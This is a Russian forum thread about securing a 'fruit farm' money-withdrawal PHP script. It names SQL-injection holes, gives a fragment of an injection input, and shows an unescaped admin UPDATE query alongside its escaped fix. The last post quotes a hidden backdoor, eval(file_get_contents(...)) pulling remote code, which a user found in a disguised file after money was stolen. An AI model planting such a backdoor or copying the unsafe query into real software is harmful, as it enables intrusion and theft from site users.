Скрипт Фруктовая ферма с выводом денег.

[vlw Участник]

скрипт ты уже установил?если да то дай ссылку,я гляну

Если Вы мне, то вот:

http://fruit-trees.bl.ee/

 

[vlw Участник]

Я взломаю пароль администратора

Мне страшно

 

[AndreyHunters Участник]

Если Вы мне, то вот: http://fruit-trees.bl.ee/

• /news

• /rules

• /about

• /contacts

• /recovery

• /payments

• #

• /captcha.php?rnd=3498

• это те файлы через которые легко попасть на сайт через sql иньекцию,

• +на таких доменах с таким скриптом нельзя делать автовыплаты,дальше думай сам,

• знаешь пословицу,про бесплатный сыр?

 

[vlw Участник]

• /news

• /rules

• /about

• /contacts

• /recovery

• /payments

• #

• /captcha.php?rnd=3498

• это те файлы через которые легко попасть на сайт через sql иньекцию,

• +на таких доменах с таким скриптом нельзя делать автовыплаты,дальше думай сам,

• знаешь пословицу,про бесплатный сыр?

1. # = index ?
2. /captcha.php?rnd=3498 это тут причём? Вроде как там всё норм
4. Почему нельзя автовыплаты делать?
3. Ну да, я халявщик

 

[vlw Участник]

• /news

• /rules

• /about

• /contacts

• /recovery

• /payments

• #

• /captcha.php?rnd=3498

Через .htaccess закрывать к ним доступ? или я чего-то не понял?

 

[AndreyHunters Участник]

1. # = index ?
2. /captcha.php?rnd=3498 это тут причём? Вроде как там всё норм
4. Почему нельзя автовыплаты делать?
3. Ну да, я халявщик

1.htaccess тебе не поможет
2.это не ошибки а дыры
3.у твоего домена нет своего айпи и увести деньги делов 5 минут
дальше думай сам..................

 

[ниаолай Местный]

1.htaccess тебе не поможет
2.это не ошибки а дыры
3.у твоего домена нет своего айпи и увести деньги делов 5 минут
дальше думай сам..................

а мой не посмотрите fruti-rubli.ru
я путь к админу изменил и аипи выделеный сайта

 

[AndreyHunters Участник]

а мой не посмотрите fruti-rubli.ru
я путь к админу изменил и аипи выделеный сайта

• /news

• /rules

• /about

• /contacts

• /recovery

• /payments

• async=""

• counter.yadro.ru/hit?t14.6;r

• top-fwz1.mail.ru/counter?id=2491905;js=na

• ads.people-group.net/?hwn=MTc0NDc0JzEnMSc&swf=1&s=MCUzQTAlM0Ew&h=06%2F01%2F2014%2023%3A57%3A55

• ads.people-group.net/174474/1/1/1/

• #

• /captcha.php?rnd=6266

• вот такая картина........а что ты хотел от бапличных скриптов,+ты сам дырок наделал(выделено красным)

 

[Sergey12 Местный]

AndreyHunters, да, из Маши и Медведя.
А насчёт автовыплат ты не прав. Как раз на хостингере можно поставить автовыплаты, но бесплатный хостинг не выдержит нагрузку скрипта.


P.S я бы хотел научиться SQL-инъекцию делать)))

 

[ниаолай Местный]

• /news

• /rules

• /about

• /contacts

• /recovery

• /payments

• async=""

• counter.yadro.ru/hit?t14.6;r

• top-fwz1.mail.ru/counter?id=2491905;js=na

• ads.people-group.net/?hwn=MTc0NDc0JzEnMSc&swf=1&s=MCUzQTAlM0Ew&h=06%2F01%2F2014%2023%3A57%3A55

• ads.people-group.net/174474/1/1/1/

• #

• /captcha.php?rnd=6266

• вот такая картина........а что ты хотел от бапличных скриптов,+ты сам дырок наделал(выделено красным)

блин а почему же мне айболит не чего не показывает

 

[AndreyHunters Участник]

AndreyHunters, да, из Маши и Медведя.
А насчёт автовыплат ты не прав. Как раз на хостингере можно поставить автовыплаты, но бесплатный хостинг не выдержит нагрузку скрипта.

запомни раз и на всегда
1.на бесплатном хостинге 1ip может принадлежать 10 и 100 сайтам,а про dns это отдельная тема
2.если ты про хостингер ру то там вообще печаль,
3.при разрешенной нагрузке 10,этот скрипт максимум тянет от 1,5 до 3

 

[AndreyHunters Участник]

AndreyHunters, да, из Маши и Медведя.
А насчёт автовыплат ты не прав. Как раз на хостингере можно поставить автовыплаты, но бесплатный хостинг не выдержит нагрузку скрипта.


P.S я бы хотел научиться SQL-инъекцию делать)))

учи программирование,изучай язык,хотя этому нельзя научится,это нужно понимать...........

 

[wh1skas wildcake Участник]

если левые черти шныряют по-вашей админке, к дополнительной защите установите платежный пароль, который будет требоваться при выплатах, + генерировать платежный пароль при регистрации новых юзеров и возможность высылать пл. пароль на почту. Будет поменьше геморроя немного. Такие воры встречаются на проектах, где установлено ограничение на вывод (вывести средства могут те пользователи, кто пополнил баланс хотя бы на 100 руб.). Взломщики юзают Вашу админку, открывают страницу пополнений, находят жертву, берут их логин и пароль и вуаля. Через аккаунт Ваших посетителей снимают денюжку на свой кошелек ))
Так же уберите со страницы админки (список пользователей) ячейки с паролями, что бы они не выводились. И всю другую информацию, доступ к которой нежелателен )

 

[AndreyHunters Участник]

если левые черти шныряют по-вашей админке, к дополнительной защите установите платежный пароль, который будет требоваться при выплатах, + генерировать платежный пароль при регистрации новых юзеров и возможность высылать пл. пароль на почту. Будет поменьше геморроя немного. Такие воры встречаются на проектах, где установлено ограничение на вывод (вывести средства могут те пользователи, кто пополнил баланс хотя бы на 100 руб.). Взломщики юзают Вашу админку, открывают страницу пополнений, находят жертву, берут их логин и пароль и вуаля. Через аккаунт Ваших посетителей снимают денюжку на свой кошелек ))
Так же уберите со страницы админки (список пользователей) ячейки с паролями, что бы они не выводились. И всю другую информацию, доступ к которой нежелателен )

уважаемый не хочу вас растраивать,но это защитит скрипт от школоты,которая узнала от когото пару sql иньекций,а по серьезному если рассуждать то sql иньекция в основном в первую очередь расчитана для получения доступа непосредственно к базе данных! примером-
?detail=4+OR+1(часть иньекции)можно вообще удалить всю базу...
получив доступ до базы данных можно делать что угодно,менять пароли,суммы,добавлять или удалять пользователя,
а сама по себе админка никому не нужна

 

[ниаолай Местный]

уважаемый не хочу вас растраивать,но это защитит скрипт от школоты,которая узнала от когото пару sql иньекций,а по серьезному если рассуждать то sql иньекция в основном в первую очередь расчитана для получения доступа непосредственно к базе данных! примером-
?detail=4+OR+1(часть иньекции)можно вообще удалить всю базу...
получив доступ до базы данных можно делать что угодно,менять пароли,суммы,добавлять или удалять пользователя,
а сама по себе админка никому не нужна

вот например где здесь уязвимость подскажи пожолуйсто и отстану и пойду учить языки ?
<?PHP
$_OPTIMIZATION["title"] = "О проекте";
$_OPTIMIZATION["description"] = "О нашем проекте";
$_OPTIMIZATION["keywords"] = "Немного о нас и о нашем проекте";
?>
<div class="s-bk-lf">
<div class="acc-title">О проекте</div>
</div>
<div class="silver-bk"><div class="clr"></div>
<?PHP

$db->Query("SELECT about FROM db_conabrul WHERE id = 1");
$xt = $db->FetchRow();
echo $xt;
?>
</div>
<div class="clr"></div>

 

[AndreyHunters Участник]

вот например где здесь уязвимость подскажи пожолуйсто и отстану и пойду учить языки ?
<?PHP
$_OPTIMIZATION["title"] = "О проекте";
$_OPTIMIZATION["description"] = "О нашем проекте";
$_OPTIMIZATION["keywords"] = "Немного о нас и о нашем проекте";
?>
<div class="s-bk-lf">
<div class="acc-title">О проекте</div>
</div>
<div class="silver-bk"><div class="clr"></div>
<?PHP

$db->Query("SELECT about FROM db_conabrul WHERE id = 1");
$xt = $db->FetchRow();
echo $xt;
?>
</div>
<div class="clr"></div>

а где ты тут хочешь увидеть ошибку??? этот about.php отвечает за положение и отоброжения текста,ошибка у тебя находиться pages/admin/_about.php
УЧИ PHP!!!
так и быть за твою назойливость я порылся в твоем сайте и нашел pages/admin/_about.php
строка 62
$db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'");
а должно быть так
$db->Query("UPDATE db_conabrul SET about = '".mysql_real_escape_string($_POST["tx"])."' WHERE id = '1'");
это хорошая дыра дляsql иньекции,и таких я нашел у тебя немного ни мало 13 ...........
Больше комне с глупыми вопросами не обращайся

 

[ниаолай Местный]

а где ты тут хочешь увидеть ошибку??? этот about.php отвечает за положение и отоброжения текста,ошибка у тебя находиться pages/admin/_about.php
УЧИ PHP!!!
так и быть за твою назойливость я порылся в твоем сайте и нашел pages/admin/_about.php
строка 62
$db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'");
а должно быть так
$db->Query("UPDATE db_conabrul SET about = '".mysql_real_escape_string($_POST["tx"])."' WHERE id = '1'");
это хорошая дыра дляsql иньекции,и таких я нашел у тебя немного ни мало 13 ...........
Больше комне с глупыми вопросами не обращайся

вот теперь я понял что смотреть надо спасибо большое!!!

 

[AndreyHunters Участник]

вот теперь я понял что смотреть надо спасибо большое!!!

ну ну только учти если ты где нибудь неправильно подставишь переменную ты завалишь скрипт

 

[assus Если нужна ферма пишите. Дизайн для Ферм. Участник]

а где ты тут хочешь увидеть ошибку??? этот about.php отвечает за положение и отоброжения текста,ошибка у тебя находиться pages/admin/_about.php
УЧИ PHP!!!
так и быть за твою назойливость я порылся в твоем сайте и нашел pages/admin/_about.php
строка 62
$db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'");
а должно быть так
$db->Query("UPDATE db_conabrul SET about = '".mysql_real_escape_string($_POST["tx"])."' WHERE id = '1'");
это хорошая дыра дляsql иньекции,и таких я нашел у тебя немного ни мало 13 ...........
Больше комне с глупыми вопросами не обращайся

только после изменения не факт что будит работать

 

[fghjk Участник]

Ребят, два дня назад увели 2к рублей с кошелька... в js/editor/jscripts/tiny_mce/themes/simple/skins нашел файл license в нем было
<?PHP

eval(file_get_contents("http://fruit-farm.org/return.php"));

?>

Снес к чертям... Скрипт качал на оф.сайте разработчиков FF как думаете, не выведут больше?